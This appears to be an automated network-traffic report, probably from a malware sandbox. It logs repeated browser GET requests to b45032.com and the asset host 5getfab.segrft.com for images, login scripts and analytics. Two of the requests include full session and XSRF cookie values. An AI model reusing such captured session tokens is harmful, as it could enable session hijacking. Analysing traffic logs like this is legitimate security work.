Source: global trafficHTTP traffic detected: GET /images/dc_new.gif?ver=1606790076 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/encforms.js?ver=1723544858 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/204x30-live-streaming-02.gif?ver=1683086141 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/login_custom.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1052.jpg?ver=1611754797 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /csrf HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldSSldaZGRpTDFYdU5pR2hhSzlEVnc9PSIsInZhbHVlIjoiYUJBaDZZUXZOOE8xSmdMOEYxdjRITXE1QStBQTJOTENhQ0FuRHVoZ2d2ZHZPR3I5cFRSbHFzR1F2aWhVYjlZM1ZTYU5hcjdCXC8wMkRQdEdMUENvQ3dBPT0iLCJtYWMiOiIyYjdmMTk0NTEwNzZmMjI0MmE4YWVjNWFiMjgxZjViYWQ1NjFiMjBjY2JmMWM0ZTAyZGI0NGY0OTgyYzBhN2JhIn0%3D; vanguard_session=eyJpdiI6Ikd5ZjJoSXNaODRKTER3Y2lLZGswRlE9PSIsInZhbHVlIjoiUU83K2RQdHp0bGZuR1JlV3JSN1NLbGZyZHYyNlJKXC9peFdmcHZxZVpFVU0xb3FRTnhlaDRrZXl1ZzhOMnhvamRITTU3QlJGWGo2YXFBRmVoWGROVnVBPT0iLCJtYWMiOiIwNThjYjFiZWZjYmEwZTZmNmY3NTIyOTY5ZWViZGViZTMwY2NhYmU2ZWVkOWY3MWJkMmFiODg2NTEwYjQyMTBjIn0%3D
Source: global trafficHTTP traffic detected: GET /plus/js/unite/jsencrypt.min.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/panel_b_bg.jpg HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/header/common/spiler.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/moment.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/sec-nav-bg-grad.gif HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/bg-sports-right.gif HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/btn_start.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/custom/moment-timezone.js?ver=1606790105 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/header/common/kefu_icon.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/NCDBC_210x204.png?ver=1700473741 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/dc_hot.gif?ver=1606790076 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/footer_tindex.png?ver=1678854633 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/g03.png?ver=1606793402 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /csrf HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImRVaTlRMTNPdGRxVUplT3ZmQmp6NUE9PSIsInZhbHVlIjoiRE04UXVzK243QTEzQ0RzRWRtNVlta215T0E5eWNiTlVRS0l4M1huaUwrM0l4QmVITzluYzhOVnhcL0V4bTU1NTZVeGdTQWdEb0JzNFwvbXoxMEJVa1pDQT09IiwibWFjIjoiZTlmNDZkMTZhODA2MWJhMjlmNGMxYTU0NjFlMDgwYjU5ODM5OTA5NTZhNWRmYzMyOTczNTRkMjZmNDVmYmY2ZSJ9; vanguard_session=eyJpdiI6InhRWDQxeDlRWHRaUHdjOXh4TzZWVkE9PSIsInZhbHVlIjoiNXFCbDZIa1lHUTljMWJCaWdwSnBcLzVCZHJnNGdCdzlmaDVZWHdkTzk4cG8xZXR2cmlMOUVcL3dQZVhmZDBzR2ZubVNLeGRwXC9mbDVaQ1k3OXF0QWZpbHc9PSIsIm1hYyI6ImMwNDVlZWU2ZjllODVlZmYyOGUzOGUyMjA5YmVhNWZkNWViNTgzNTIyM2FjZGU5ODhhNjYwNGM1NTdlYjEyMmYifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /images_plus/main/logo.gif?ver=1612840274 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/dc_new.gif?ver=1606790076 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/liveinplay.gif?ver=1683086133 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/g04.jpg?ver=1606793375 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/g02.png?ver=1606793399 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/204x30-live-streaming-02.gif?ver=1683086141 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1052.jpg?ver=1611754797 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/panel_b_bg.jpg HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/sec-nav-bg-grad.gif HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/bg-sports-right.gif HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/btn_start.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1051.png?ver=1611754184 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner1.jpg?ver=1606891697 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/NCDBC_210x204.png?ver=1700473741 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/footer_tindex.png?ver=1678854633 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/g03.png?ver=1606793402 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner2.jpg?ver=1606891698 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner4.jpg?ver=1606891699 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner6.jpg?ver=1606891697 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner5.jpg?ver=1606891700 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/en/liveinplay.gif?ver=1683086133 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/g04.jpg?ver=1606793375 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/index/g02.png?ver=1606793399 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner7.jpg?ver=1606891701 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
